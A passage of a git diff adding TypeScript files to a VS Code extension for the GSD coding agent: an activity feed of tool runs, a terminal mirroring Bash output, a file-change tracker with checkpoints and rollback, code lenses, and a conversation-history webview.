+	id: number;
+	type: "tool" | "agent";
+	label: string;
+	detail: string;
+	icon: vscode.ThemeIcon;
+	timestamp: number;
+	duration?: number;
+	filePath?: string;
+	status: "running" | "success" | "error";
+}
+
+const TOOL_ICONS: Record<string, string> = {
+	Read: "file",
+	Write: "new-file",
+	Edit: "edit",
+	Bash: "terminal",
+	Grep: "search",
+	Glob: "file-directory",
+	Agent: "organization",
+};
+
+function toolSummary(toolName: string, toolInput: Record<string, unknown>): { label: string; filePath?: string } {
+	const name = toolName ?? "Unknown";
+	switch (name) {
+		case "Read": {
+			const p = String(toolInput?.file_path ?? toolInput?.path ?? "");
+			const short = p.split(/[\\/]/).pop() ?? p;
+			return { label: `Read ${short}`, filePath: p || undefined };
+		}
+		case "Write": {
+			const p = String(toolInput?.file_path ?? "");
+			const short = p.split(/[\\/]/).pop() ?? p;
+			return { label: `Write ${short}`, filePath: p || undefined };
+		}
+		case "Edit": {
+			const p = String(toolInput?.file_path ?? "");
+			const short = p.split(/[\\/]/).pop() ?? p;
+			return { label: `Edit ${short}`, filePath: p || undefined };
+		}
+		case "Bash": {
+			const cmd = String(toolInput?.command ?? "").slice(0, 60);
+			return { label: `Bash: ${cmd}` };
+		}
+		case "Grep": {
+			const pat = String(toolInput?.pattern ?? "").slice(0, 40);
+			return { label: `Grep: ${pat}` };
+		}
+		case "Glob": {
+			const pat = String(toolInput?.pattern ?? "").slice(0, 40);
+			return { label: `Glob: ${pat}` };
+		}
+		default:
+			return { label: name };
+	}
+}
+
+/**
+ * TreeDataProvider that shows real-time tool executions from the GSD agent.
+ * Listens to tool_execution_start/end and agent_start/end events.
+ */
+export class GsdActivityFeedProvider implements vscode.TreeDataProvider<ActivityItem>, vscode.Disposable {
+	public static readonly viewId = "gsd-activity";
+
+	private readonly _onDidChangeTreeData = new vscode.EventEmitter<void>();
+	readonly onDidChangeTreeData = this._onDidChangeTreeData.event;
+
+	private items: ActivityItem[] = [];
+	private nextId = 0;
+	private runningTools = new Map<string, number>(); // toolUseId -> item id
+	private maxItems: number;
+	private disposables: vscode.Disposable[] = [];
+
+	constructor(private readonly client: GsdClient) {
+		this.maxItems = vscode.workspace.getConfiguration("gsd").get<number>("activityFeedMaxItems", 100);
+
+		this.disposables.push(
+			this._onDidChangeTreeData,
+			client.onEvent((evt) => this.handleEvent(evt)),
+			client.onConnectionChange((connected) => {
+				if (!connected) {
+					this.runningTools.clear();
+				}
+				this._onDidChangeTreeData.fire();
+			}),
+			vscode.workspace.onDidChangeConfiguration((e) => {
+				if (e.affectsConfiguration("gsd.activityFeedMaxItems")) {
+					this.maxItems = vscode.workspace.getConfiguration("gsd").get<number>("activityFeedMaxItems", 100);
+				}
+			}),
+		);
+	}
+
+	getTreeItem(element: ActivityItem): vscode.TreeItem {
+		const item = new vscode.TreeItem(element.label, vscode.TreeItemCollapsibleState.None);
+		item.iconPath = element.icon;
+		item.description = element.duration !== undefined
+			? `${element.duration}ms`
+			: element.status === "running"
+				? "running..."
+				: "";
+		item.tooltip = `${element.detail}\n${new Date(element.timestamp).toLocaleTimeString()}`;
+
+		if (element.filePath) {
+			item.command = {
+				command: "vscode.open",
+				title: "Open File",
+				arguments: [vscode.Uri.file(element.filePath)],
+			};
+		}
+
+		return item;
+	}
+
+	getChildren(): ActivityItem[] {
+		// Show newest first
+		return [...this.items].reverse();
+	}
+
+	clear(): void {
+		this.items = [];
+		this.runningTools.clear();
+		this._onDidChangeTreeData.fire();
+	}
+
+	dispose(): void {
+		for (const d of this.disposables) {
+			d.dispose();
+		}
+	}
+
+	private handleEvent(evt: AgentEvent): void {
+		switch (evt.type) {
+			case "agent_start": {
+				this.addItem({
+					type: "agent",
+					label: "Agent started",
+					detail: "Agent began processing",
+					icon: new vscode.ThemeIcon("play", new vscode.ThemeColor("testing.iconPassed")),
+					status: "running",
+				});
+				break;
+			}
+			case "agent_end": {
+				this.addItem({
+					type: "agent",
+					label: "Agent finished",
+					detail: "Agent completed processing",
+					icon: new vscode.ThemeIcon("check", new vscode.ThemeColor("testing.iconPassed")),
+					status: "success",
+				});
+				break;
+			}
+			case "tool_execution_start": {
+				const toolName = String(evt.toolName ?? "");
+				const toolInput = (evt.toolInput ?? {}) as Record<string, unknown>;
+				const toolUseId = String(evt.toolUseId ?? "");
+				const { label, filePath } = toolSummary(toolName, toolInput);
+				const iconName = TOOL_ICONS[toolName] ?? "tools";
+
+				const id = this.addItem({
+					type: "tool",
+					label,
+					detail: `Tool: ${toolName}`,
+					icon: new vscode.ThemeIcon(iconName, new vscode.ThemeColor("charts.yellow")),
+					status: "running",
+					filePath,
+				});
+
+				if (toolUseId) {
+					this.runningTools.set(toolUseId, id);
+				}
+				break;
+			}
+			case "tool_execution_end": {
+				const toolUseId = String(evt.toolUseId ?? "");
+				const itemId = this.runningTools.get(toolUseId);
+				if (itemId !== undefined) {
+					this.runningTools.delete(toolUseId);
+					const item = this.items.find((i) => i.id === itemId);
+					if (item) {
+						const isError = evt.error === true || evt.isError === true;
+						item.status = isError ? "error" : "success";
+						item.duration = Date.now() - item.timestamp;
+						item.icon = new vscode.ThemeIcon(
+							isError ? "error" : "check",
+							new vscode.ThemeColor(isError ? "testing.iconFailed" : "testing.iconPassed"),
+						);
+						this._onDidChangeTreeData.fire();
+					}
+				}
+				break;
+			}
+		}
+	}
+
+	private addItem(partial: Omit<ActivityItem, "id" | "timestamp">): number {
+		const id = this.nextId++;
+		this.items.push({ ...partial, id, timestamp: Date.now() });
+
+		// Evict old items
+		while (this.items.length > this.maxItems) {
+			this.items.shift();
+		}
+
+		this._onDidChangeTreeData.fire();
+		return id;
+	}
+}
diff --git a/vscode-extension/src/bash-terminal.ts b/vscode-extension/src/bash-terminal.ts
new file mode 100644
index 000000000..7d1226615
--- /dev/null
+++ b/vscode-extension/src/bash-terminal.ts
@@ -0,0 +1,84 @@
+import * as vscode from "vscode";
+import type { AgentEvent, GsdClient } from "./gsd-client.js";
+
+/**
+ * Routes the GSD agent's Bash tool output to a dedicated VS Code terminal panel.
+ * Shows streaming output from tool_execution_update events in real time.
+ */
+export class GsdBashTerminal implements vscode.Disposable {
+	private terminal: vscode.Terminal | undefined;
+	private writeEmitter: vscode.EventEmitter<string> | undefined;
+	private disposables: vscode.Disposable[] = [];
+
+	constructor(client: GsdClient) {
+		this.disposables.push(
+			client.onEvent((evt: AgentEvent) => this.handleEvent(evt)),
+			client.onConnectionChange((connected) => {
+				if (!connected) {
+					this.close();
+				}
+			}),
+		);
+	}
+
+	private getOrCreateTerminal(): { terminal: vscode.Terminal; writeEmitter: vscode.EventEmitter<string> } {
+		if (!this.terminal || this.terminal.exitStatus !== undefined) {
+			this.writeEmitter?.dispose();
+			this.writeEmitter = new vscode.EventEmitter<string>();
+			const emitter = this.writeEmitter;
+			const pty: vscode.Pseudoterminal = {
+				onDidWrite: emitter.event,
+				open: () => {},
+				close: () => { this.terminal = undefined; },
+			};
+			this.terminal = vscode.window.createTerminal({ name: "GSD Agent", pty });
+		}
+		return { terminal: this.terminal, writeEmitter: this.writeEmitter! };
+	}
+
+	private handleEvent(evt: AgentEvent): void {
+		switch (evt.type) {
+			case "tool_execution_start": {
+				if (evt.toolName !== "Bash") {
+					break;
+				}
+				const cmd = (evt.toolInput as Record<string, unknown> | undefined)?.command as string | undefined;
+				const { terminal, writeEmitter } = this.getOrCreateTerminal();
+				terminal.show(true); // preserve editor focus
+				writeEmitter.fire(`\x1b[90m$ ${cmd ?? ""}\x1b[0m\r\n`);
+				break;
+			}
+			case "tool_execution_update": {
+				if (evt.toolName !== "Bash" || !this.writeEmitter) {
+					break;
+				}
+				const partial = evt.partialResult as string | undefined;
+				if (partial) {
+					this.writeEmitter.fire(partial.replace(/\n/g, "\r\n"));
+				}
+				break;
+			}
+			case "tool_execution_end": {
+				if (evt.toolName !== "Bash" || !this.writeEmitter) {
+					break;
+				}
+				this.writeEmitter.fire("\r\n");
+				break;
+			}
+		}
+	}
+
+	close(): void {
+		this.terminal?.dispose();
+		this.terminal = undefined;
+		this.writeEmitter?.dispose();
+		this.writeEmitter = undefined;
+	}
+
+	dispose(): void {
+		this.close();
+		for (const d of this.disposables) {
+			d.dispose();
+		}
+	}
+}
diff --git a/vscode-extension/src/change-tracker.ts b/vscode-extension/src/change-tracker.ts
new file mode 100644
index 000000000..f10191d65
--- /dev/null
+++ b/vscode-extension/src/change-tracker.ts
@@ -0,0 +1,295 @@
+import * as vscode from "vscode";
+import * as fs from "node:fs";
+import type { GsdClient, AgentEvent } from "./gsd-client.js";
+
+export interface FileSnapshot {
+	uri: vscode.Uri;
+	originalContent: string;
+	timestamp: number;
+}
+
+export interface Checkpoint {
+	id: number;
+	label: string;
+	timestamp: number;
+	/** Map of file path → original content at checkpoint creation time */
+	snapshots: Map<string, string>;
+}
+
+/**
+ * Tracks file changes made by the GSD agent. Stores original file content
+ * before the agent modifies it, enabling diff views, SCM integration,
+ * and checkpoint/rollback functionality.
+ */
+export class GsdChangeTracker implements vscode.Disposable {
+	/** file path → original content (before first agent modification this session) */
+	private originals = new Map<string, string>();
+	/** Set of file paths modified in the current agent turn */
+	private currentTurnFiles = new Set<string>();
+	/** Ordered list of checkpoints */
+	private _checkpoints: Checkpoint[] = [];
+	private nextCheckpointId = 1;
+	/** toolUseId → file path for in-flight tool executions */
+	private pendingTools = new Map<string, string>();
+	/** Whether the current turn has been described in the checkpoint label */
+	private turnDescribed = false;
+
+	private readonly _onDidChange = new vscode.EventEmitter<string[]>();
+	/** Fires when the set of tracked files changes. Payload is array of changed file paths. */
+	readonly onDidChange = this._onDidChange.event;
+
+	private readonly _onCheckpointChange = new vscode.EventEmitter<void>();
+	readonly onCheckpointChange = this._onCheckpointChange.event;
+
+	private disposables: vscode.Disposable[] = [];
+
+	constructor(private readonly client: GsdClient) {
+		this.disposables.push(this._onDidChange, this._onCheckpointChange);
+
+		this.disposables.push(
+			client.onEvent((evt) => this.handleEvent(evt)),
+			client.onConnectionChange((connected) => {
+				if (!connected) {
+					this.reset();
+				}
+			}),
+		);
+	}
+
+	/** All file paths that have been modified by the agent */
+	get modifiedFiles(): string[] {
+		return [...this.originals.keys()];
+	}
+
+	/** Get the original content of a file (before agent first modified it) */
+	getOriginal(filePath: string): string | undefined {
+		return this.originals.get(filePath);
+	}
+
+	/** Whether the tracker has any modifications */
+	get hasChanges(): boolean {
+		return this.originals.size > 0;
+	}
+
+	/** Current checkpoints (newest first) */
+	get checkpoints(): readonly Checkpoint[] {
+		return this._checkpoints;
+	}
+
+	/**
+	 * Discard agent changes to a single file — restore original content.
+	 * Returns true if the file was restored.
+	 */
+	async discardFile(filePath: string): Promise<boolean> {
+		const original = this.originals.get(filePath);
+		if (original === undefined) return false;
+
+		try {
+			await fs.promises.writeFile(filePath, original, "utf8");
+			this.originals.delete(filePath);
+			this._onDidChange.fire([filePath]);
+			return true;
+		} catch {
+			return false;
+		}
+	}
+
+	/**
+	 * Discard all agent changes — restore all files to their original state.
+	 */
+	async discardAll(): Promise<number> {
+		let count = 0;
+		const paths = [...this.originals.keys()];
+		for (const filePath of paths) {
+			if (await this.discardFile(filePath)) {
+				count++;
+			}
+		}
+		return count;
+	}
+
+	/**
+	 * Accept changes to a file — remove from tracking (keep the current content).
+	 */
+	acceptFile(filePath: string): void {
+		if (this.originals.delete(filePath)) {
+			this._onDidChange.fire([filePath]);
+		}
+	}
+
+	/**
+	 * Accept all changes — clear all tracking.
+	 */
+	acceptAll(): void {
+		const paths = [...this.originals.keys()];
+		this.originals.clear();
+		if (paths.length > 0) {
+			this._onDidChange.fire(paths);
+		}
+	}
+
+	/**
+	 * Restore all files to a checkpoint state.
+	 */
+	async restoreCheckpoint(checkpointId: number): Promise<number> {
+		const idx = this._checkpoints.findIndex((c) => c.id === checkpointId);
+		if (idx === -1) return 0;
+
+		const checkpoint = this._checkpoints[idx];
+		let count = 0;
+
+		for (const [filePath, content] of checkpoint.snapshots) {
+			try {
+				await fs.promises.writeFile(filePath, content, "utf8");
+				count++;
+			} catch {
+				// skip files that can't be restored
+			}
+		}
+
+		// Reset originals to the checkpoint state
+		this.originals = new Map(checkpoint.snapshots);
+
+		// Remove all checkpoints after this one
+		this._checkpoints = this._checkpoints.slice(0, idx);
+
+		this._onDidChange.fire([...checkpoint.snapshots.keys()]);
+		this._onCheckpointChange.fire();
+		return count;
+	}
+
+	/** Clear all tracking state */
+	reset(): void {
+		const paths = [...this.originals.keys()];
+		this.originals.clear();
+		this.currentTurnFiles.clear();
+		this.pendingTools.clear();
+		this._checkpoints = [];
+		this.nextCheckpointId = 1;
+		if (paths.length > 0) {
+			this._onDidChange.fire(paths);
+		}
+		this._onCheckpointChange.fire();
+	}
+
+	dispose(): void {
+		for (const d of this.disposables) {
+			d.dispose();
+		}
+	}
+
+	private handleEvent(evt: AgentEvent): void {
+		switch (evt.type) {
+			case "agent_start":
+				this.createCheckpoint();
+				this.currentTurnFiles.clear();
+				this.turnDescribed = false;
+				break;
+
+			case "tool_execution_start": {
+				const toolName = String(evt.toolName ?? "");
+				const toolInput = (evt.toolInput ?? {}) as Record<string, unknown>;
+				const toolUseId = String(evt.toolUseId ?? "");
+
+				// Update checkpoint label with first action description
+				if (!this.turnDescribed) {
+					this.turnDescribed = true;
+					this.updateLatestCheckpointLabel(describeAction(toolName, toolInput));
+				}
+
+				if (toolName !== "Write" && toolName !== "Edit") break;
+
+				const filePath = String(toolInput.file_path ?? toolInput.path ?? "");
+
+				if (!filePath) break;
+
+				// Store the original content before the agent modifies it
+				// Only capture on FIRST modification (don't overwrite)
+				if (!this.originals.has(filePath)) {
+					try {
+						if (fs.existsSync(filePath)) {
+							const content = fs.readFileSync(filePath, "utf8");
+							this.originals.set(filePath, content);
+						} else {
+							// File doesn't exist yet — original is "empty" (new file)
+							this.originals.set(filePath, "");
+						}
+					} catch {
+						// Can't read file, skip tracking
+					}
+				}
+
+				if (toolUseId) {
+					this.pendingTools.set(toolUseId, filePath);
+				}
+				break;
+			}
+
+			case "tool_execution_end": {
+				const toolUseId = String(evt.toolUseId ?? "");
+				const filePath = this.pendingTools.get(toolUseId);
+				if (filePath) {
+					this.pendingTools.delete(toolUseId);
+					this.currentTurnFiles.add(filePath);
+					this._onDidChange.fire([filePath]);
+				}
+				break;
+			}
+		}
+	}
+
+	private createCheckpoint(): void {
+		const now = Date.now();
+		const time = new Date(now).toLocaleTimeString([], { hour: "2-digit", minute: "2-digit", second: "2-digit" });
+		const fileCount = this.originals.size;
+		const label = fileCount > 0
+			? `${time} (${fileCount} file${fileCount !== 1 ? "s" : ""} tracked)`
+			: `${time} (start)`;
+
+		const checkpoint: Checkpoint = {
+			id: this.nextCheckpointId++,
+			label,
+			timestamp: now,
+			snapshots: new Map(this.originals),
+		};
+		this._checkpoints.push(checkpoint);
+		this._onCheckpointChange.fire();
+	}
+
+	/**
+	 * Update the label of the latest checkpoint with a description
+	 * of the first action taken (called after first tool execution in a turn).
+	 */
+	private updateLatestCheckpointLabel(description: string): void {
+		if (this._checkpoints.length === 0) return;
+		const latest = this._checkpoints[this._checkpoints.length - 1];
+		const time = new Date(latest.timestamp).toLocaleTimeString([], { hour: "2-digit", minute: "2-digit", second: "2-digit" });
+		latest.label = `${time} — ${description}`;
+		this._onCheckpointChange.fire();
+	}
+}
+
+function describeAction(toolName: string, input: Record<string, unknown>): string {
+	switch (toolName) {
+		case "Read": {
+			const p = String(input.file_path ?? input.path ?? "");
+			return `Read ${p.split(/[\\/]/).pop() ?? p}`;
+		}
+		case "Write": {
+			const p = String(input.file_path ?? "");
+			return `Write ${p.split(/[\\/]/).pop() ?? p}`;
+		}
+		case "Edit": {
+			const p = String(input.file_path ?? "");
+			return `Edit ${p.split(/[\\/]/).pop() ?? p}`;
+		}
+		case "Bash":
+			return `$ ${String(input.command ?? "").slice(0, 40)}`;
+		case "Grep":
+			return `Grep: ${String(input.pattern ?? "").slice(0, 30)}`;
+		case "Glob":
+			return `Glob: ${String(input.pattern ?? "").slice(0, 30)}`;
+		default:
+			return toolName;
+	}
+}
diff --git a/vscode-extension/src/chat-participant.ts b/vscode-extension/src/chat-participant.ts
index 01647e1ad..6ba3e60e2 100644
--- a/vscode-extension/src/chat-participant.ts
+++ b/vscode-extension/src/chat-participant.ts
@@ -39,6 +39,21 @@ export function registerChatParticipant(
 			message = `${fileContext}\n\n${message}`;
 		}
 
+		// Auto-include editor selection if present and not already referenced
+		const selectionContext = getSelectionContext();
+		if (selectionContext) {
+			message = `${selectionContext}\n\n${message}`;
+		}
+
+		// Auto-include diagnostics for the active file if the prompt mentions "fix", "error", "problem", "warning"
+		const fixKeywords = /\b(fix|error|problem|warning|issue|bug|lint|diagnos)/i;
+		if (fixKeywords.test(message)) {
+			const diagContext = getActiveDiagnosticsContext();
+			if (diagContext) {
+				message = `${message}\n\n${diagContext}`;
+			}
+		}
+
 		// Track streaming state
 		let agentDone = false;
 		let totalInputTokens = 0;
@@ -281,3 +296,42 @@ function resolveFileUri(fp: string): vscode.Uri | null {
 		return null;
 	}
 }
+
+/**
+ * Get the current editor selection as context, if any text is selected.
+ */
+function getSelectionContext(): string | null {
+	const editor = vscode.window.activeTextEditor;
+	if (!editor || editor.selection.isEmpty) return null;
+
+	const selection = editor.document.getText(editor.selection);
+	if (!selection.trim()) return null;
+
+	const relativePath = vscode.workspace.asRelativePath(editor.document.uri);
+	const { start, end } = editor.selection;
+	return `Selected code in \`${relativePath}\` (lines ${start.line + 1}-${end.line + 1}):\n\`\`\`\n${selection}\n\`\`\``;
+}
+
+/**
+ * Get diagnostics (errors/warnings) for the active editor file.
+ */
+function getActiveDiagnosticsContext(): string | null {
+	const editor = vscode.window.activeTextEditor;
+	if (!editor) return null;
+
+	const diagnostics = vscode.languages.getDiagnostics(editor.document.uri);
+	const significant = diagnostics.filter(
+		(d) => d.severity === vscode.DiagnosticSeverity.Error || d.severity === vscode.DiagnosticSeverity.Warning,
+	);
+	if (significant.length === 0) return null;
+
+	const relativePath = vscode.workspace.asRelativePath(editor.document.uri);
+	const lines = [`Current diagnostics in \`${relativePath}\`:`];
+	for (const d of significant) {
+		const sev = d.severity === vscode.DiagnosticSeverity.Error ? "Error" : "Warning";
+		const line = d.range.start.line + 1;
+		const source = d.source ? ` [${d.source}]` : "";
+		lines.push(`- ${sev} (line ${line}): ${d.message}${source}`);
+	}
+	return lines.join("\n");
+}
diff --git a/vscode-extension/src/checkpoints.ts b/vscode-extension/src/checkpoints.ts
new file mode 100644
index 000000000..584c9011c
--- /dev/null
+++ b/vscode-extension/src/checkpoints.ts
@@ -0,0 +1,55 @@
+import * as vscode from "vscode";
+import type { GsdChangeTracker, Checkpoint } from "./change-tracker.js";
+
+/**
+ * TreeDataProvider that shows agent checkpoints (one per agent turn).
+ * Each checkpoint can be restored to revert all file changes since that point.
+ */
+export class GsdCheckpointProvider implements vscode.TreeDataProvider<Checkpoint>, vscode.Disposable {
+	public static readonly viewId = "gsd-checkpoints";
+
+	private readonly _onDidChangeTreeData = new vscode.EventEmitter<void>();
+	readonly onDidChangeTreeData = this._onDidChangeTreeData.event;
+
+	private disposables: vscode.Disposable[] = [];
+
+	constructor(private readonly tracker: GsdChangeTracker) {
+		this.disposables.push(
+			this._onDidChangeTreeData,
+			tracker.onCheckpointChange(() => this._onDidChangeTreeData.fire()),
+		);
+	}
+
+	getTreeItem(checkpoint: Checkpoint): vscode.TreeItem {
+		const fileCount = checkpoint.snapshots.size;
+		const time = new Date(checkpoint.timestamp);
+		const timeStr = time.toLocaleTimeString([], { hour: "2-digit", minute: "2-digit", second: "2-digit" });
+
+		const item = new vscode.TreeItem(
+			checkpoint.label,
+			vscode.TreeItemCollapsibleState.None,
+		);
+		item.description = `${timeStr} (${fileCount} file${fileCount !== 1 ? "s" : ""})`;
+		item.iconPath = new vscode.ThemeIcon("history");
+		item.tooltip = `Checkpoint: ${checkpoint.label}\nTime: ${time.toLocaleString()}\nFiles tracked: ${fileCount}\n\nClick to restore to this point`;
+		item.contextValue = "checkpoint";
+		item.command = {
+			command: "gsd.restoreCheckpoint",
+			title: "Restore Checkpoint",
+			arguments: [checkpoint.id],
+		};
+
+		return item;
+	}
+
+	getChildren(): Checkpoint[] {
+		// Show newest first
+		return [...this.tracker.checkpoints].reverse();
+	}
+
+	dispose(): void {
+		for (const d of this.disposables) {
+			d.dispose();
+		}
+	}
+}
diff --git a/vscode-extension/src/code-lens.ts b/vscode-extension/src/code-lens.ts
new file mode 100644
index 000000000..eb6754ad7
--- /dev/null
+++ b/vscode-extension/src/code-lens.ts
@@ -0,0 +1,139 @@
+import * as vscode from "vscode";
+import type { GsdClient } from "./gsd-client.js";
+
+/**
+ * Patterns that identify the start of a named function, class, or method
+ * declaration in common languages. Each entry captures the symbol name in
+ * capture group 1.
+ */
+const SYMBOL_PATTERNS: { languages: string[]; regex: RegExp }[] = [
+	{
+		// TypeScript / JavaScript: function foo(...) | async function foo(...)
+		languages: ["typescript", "typescriptreact", "javascript", "javascriptreact"],
+		regex: /^\s*(?:export\s+)?(?:async\s+)?function\s+(\w+)\s*[(<]/,
+	},
+	{
+		// TypeScript / JavaScript: class Foo
+		languages: ["typescript", "typescriptreact", "javascript", "javascriptreact"],
+		regex: /^\s*(?:export\s+)?(?:abstract\s+)?class\s+(\w+)/,
+	},
+	{
+		// TypeScript / JavaScript: method declarations inside a class
+		//   foo(...) { | async foo(...) { | private foo(...): T {
+		languages: ["typescript", "typescriptreact", "javascript", "javascriptreact"],
+		regex: /^\s*(?:(?:public|private|protected|static|async|readonly)\s+)*(\w+)\s*\(/,
+	},
+	{
+		// Python: def foo( | async def foo(
+		languages: ["python"],
+		regex: /^\s*(?:async\s+)?def\s+(\w+)\s*\(/,
+	},
+	{
+		// Python: class Foo
+		languages: ["python"],
+		regex: /^\s*class\s+(\w+)/,
+	},
+	{
+		// Go: func foo( | func (r Receiver) foo(
+		languages: ["go"],
+		regex: /^\s*func\s+(?:\([^)]+\)\s+)?(\w+)\s*\(/,
+	},
+	{
+		// Rust: fn foo( | pub fn foo( | async fn foo(
+		languages: ["rust"],
+		regex: /^\s*(?:pub(?:\([^)]+\))?\s+)?(?:async\s+)?fn\s+(\w+)\s*[(<]/,
+	},
+];
+
+/**
+ * CodeLensProvider that adds an "Ask GSD" lens above named function and class
+ * declarations. Clicking the lens sends a brief explanation request to the GSD
+ * agent for that specific symbol.
+ */
+export class GsdCodeLensProvider implements vscode.CodeLensProvider, vscode.Disposable {
+	private readonly _onDidChangeCodeLenses = new vscode.EventEmitter<void>();
+	readonly onDidChangeCodeLenses = this._onDidChangeCodeLenses.event;
+
+	private disposables: vscode.Disposable[] = [];
+
+	constructor(private readonly client: GsdClient) {
+		this.disposables.push(
+			this._onDidChangeCodeLenses,
+			client.onConnectionChange(() => this._onDidChangeCodeLenses.fire()),
+			vscode.workspace.onDidChangeConfiguration((e) => {
+				if (e.affectsConfiguration("gsd.codeLens")) {
+					this._onDidChangeCodeLenses.fire();
+				}
+			}),
+		);
+	}
+
+	provideCodeLenses(
+		document: vscode.TextDocument,
+		_token: vscode.CancellationToken,
+	): vscode.CodeLens[] {
+		const lenses: vscode.CodeLens[] = [];
+
+		if (!vscode.workspace.getConfiguration("gsd").get<boolean>("codeLens", true)) {
+			return lenses;
+		}
+		const langId = document.languageId;
+		const patterns = SYMBOL_PATTERNS.filter((p) => p.languages.includes(langId));
+
+		if (patterns.length === 0) {
+			return lenses;
+		}
+
+		const fileName = document.fileName.split(/[\\/]/).pop() ?? document.fileName;
+		const seen = new Set<number>();
+
+		for (let i = 0; i < document.lineCount; i++) {
+			const text = document.lineAt(i).text;
+
+			for (const { regex } of patterns) {
+				const match = regex.exec(text);
+				if (match && match[1] && !seen.has(i)) {
+					seen.add(i);
+					const symbolName = match[1];
+					const range = new vscode.Range(i, 0, i, text.length);
+					const args = [symbolName, fileName, i + 1];
+
+					lenses.push(
+						new vscode.CodeLens(range, {
+							title: "$(hubot) Ask GSD",
+							tooltip: `Ask GSD to explain ${symbolName}`,
+							command: "gsd.askAboutSymbol",
+							arguments: args,
+						}),
+						new vscode.CodeLens(range, {
+							title: "$(pencil) Refactor",
+							tooltip: `Refactor ${symbolName}`,
+							command: "gsd.refactorSymbol",
+							arguments: args,
+						}),
+						new vscode.CodeLens(range, {
+							title: "$(bug) Find Bugs",
+							tooltip: `Review ${symbolName} for bugs`,
+							command: "gsd.findBugsSymbol",
+							arguments: args,
+						}),
+						new vscode.CodeLens(range, {
+							title: "$(beaker) Tests",
+							tooltip: `Generate tests for ${symbolName}`,
+							command: "gsd.generateTestsSymbol",
+							arguments: args,
+						}),
+					);
+				}
+			}
+		}
+
+		return lenses;
+	}
+
+	dispose(): void {
+		for (const d of this.disposables) {
+			d.dispose();
+		}
+	}
+}
diff --git a/vscode-extension/src/conversation-history.ts b/vscode-extension/src/conversation-history.ts
new file mode 100644
index 000000000..a8904cc63
--- /dev/null
+++ b/vscode-extension/src/conversation-history.ts
@@ -0,0 +1,428 @@
+import * as vscode from "vscode";
+import type { GsdClient } from "./gsd-client.js";
+
+interface ContentBlock {
+	type: string;
+	text?: string;
+	name?: string;
+	input?: Record<string, unknown>;
+	content?: string | ContentBlock[];
+	[key: string]: unknown;
+}
+
+interface ConversationMessage {
+	role: "user" | "assistant" | "system";
+	content: string | ContentBlock[];
+}
+
+/**
+ * Webview panel that displays the full conversation history for the
+ * current GSD session using the get_messages RPC call. Shows tool calls,
+ * thinking blocks, search/filter, and fork-from-here actions.
+ */
+export class GsdConversationHistoryPanel implements vscode.Disposable {
+	private static currentPanel: GsdConversationHistoryPanel | undefined;
+
+	private readonly panel: vscode.WebviewPanel;
+	private readonly client: GsdClient;
+	private disposables: vscode.Disposable[] = [];
+
+	static createOrShow(
+		extensionUri: vscode.Uri,
+		client: GsdClient,
+	): GsdConversationHistoryPanel {
+		const column = vscode.window.activeTextEditor?.viewColumn ?? vscode.ViewColumn.One;
+
+		if (GsdConversationHistoryPanel.currentPanel) {
+			GsdConversationHistoryPanel.currentPanel.panel.reveal(column);
+			void GsdConversationHistoryPanel.currentPanel.refresh();
+			return GsdConversationHistoryPanel.currentPanel;
+		}
+
+		const panel = vscode.window.createWebviewPanel(
+			"gsd-history",
+			"GSD Conversation History",
+			column,
+			{
+				enableScripts: true,
+				retainContextWhenHidden: true,
+			},
+		);
+
+		GsdConversationHistoryPanel.currentPanel = new GsdConversationHistoryPanel(
+			panel,
+			extensionUri,
+			client,
+		);
+		void GsdConversationHistoryPanel.currentPanel.refresh();
+		return GsdConversationHistoryPanel.currentPanel;
+	}
+
+	private constructor(
+		panel: vscode.WebviewPanel,
+		_extensionUri: vscode.Uri,
+		client: GsdClient,
+	) {
+		this.panel = panel;
+		this.client = client;
+
+		this.panel.onDidDispose(() => this.dispose(), null, this.disposables);
+
+		this.panel.webview.onDidReceiveMessage(
+			async (msg: { command: string; entryId?: string }) => {
+				if (msg.command === "refresh") {
+					await this.refresh();
+				} else if (msg.command === "fork" && msg.entryId) {
+					try {
+						const result = await this.client.forkSession(msg.entryId);
+						if (!result.cancelled) {
+							vscode.window.showInformationMessage("Session forked successfully.");
+						}
+					} catch (err) {
+						const errMsg = err instanceof Error ? err.message : String(err);
+						vscode.window.showErrorMessage(`Fork failed: ${errMsg}`);
+					}
+				}
+			},
+			null,
+			this.disposables,
+		);
+	}
+
+	async refresh(): Promise<void> {
+		if (!this.client.isConnected) {
+			this.panel.webview.html = this.getHtml([], "Not connected to GSD agent.");
+			return;
+		}
+
+		try {
+			const raw = await this.client.getMessages();
+			this.panel.webview.html = this.getHtml(raw as ConversationMessage[]);
+		} catch (err) {
+			const msg = err instanceof Error ? err.message : String(err);
+			this.panel.webview.html = this.getHtml([], `Error loading messages: ${msg}`);
+		}
+	}
+
+	dispose(): void {
+		GsdConversationHistoryPanel.currentPanel = undefined;
+		this.panel.dispose();
+		for (const d of this.disposables) {
+			d.dispose();
+		}
+	}
+
+	private getHtml(messages: ConversationMessage[], errorMessage?: string): string {
+		const nonce = getNonce();
+		const visibleMessages = messages.filter((m) => m.role === "user" || m.role === "assistant");
+
+		const renderedMessages = visibleMessages
+			.map((msg, idx) => {
+				const isUser = msg.role === "user";
+				const blocks = renderContentBlocks(msg.content);
+				if (!blocks.trim()) return "";
+
+				const entryId = `msg-${idx}`;
+				const forkBtn = `<button class="fork-btn" data-entry-id="${entryId}" title="Fork from this message">Fork</button>`;
+
+				return `<div class="message ${isUser ? "user" : "assistant"}" id="${entryId}">
+				<div class="role-row">
+					<span class="role">${isUser ? "You" : "GSD"}</span>
+					${forkBtn}
+				</div>
+				<div class="content">${blocks}</div>
+			</div>`;
+			})
+			.filter(Boolean)
+			.join("\n");
+
+		return /* html */ `<!DOCTYPE html>
+<html lang="en">
+<head>
+	<meta charset="UTF-8">
+	<meta name="viewport" content="width=device-width, initial-scale=1.0">
+	<meta http-equiv="Content-Security-Policy" content="default-src 'none'; style-src 'unsafe-inline'; script-src 'nonce-${nonce}';">
+	<style>
+		body {
+			font-family: var(--vscode-font-family);
+			font-size: var(--vscode-font-size);
+			color: var(--vscode-foreground);
+			padding: 16px;
+			margin: 0;
+		}
+		h2 {
+			margin: 0 0 12px;
+			font-size: 15px;
+			font-weight: 600;
+		}
+		.toolbar {
+			display: flex;
+			align-items: center;
+			gap: 8px;
+			margin-bottom: 16px;
+		}
+		.search-input {
+			flex: 1;
+			padding: 5px 10px;
+			border: 1px solid var(--vscode-input-border);
+			background: var(--vscode-input-background);
+			color: var(--vscode-input-foreground);
+			border-radius: 2px;
+			font-size: var(--vscode-font-size);
+		}
+		.btn {
+			padding: 5px 12px;
+			border: none;
+			border-radius: 2px;
+			cursor: pointer;
+			font-size: var(--vscode-font-size);
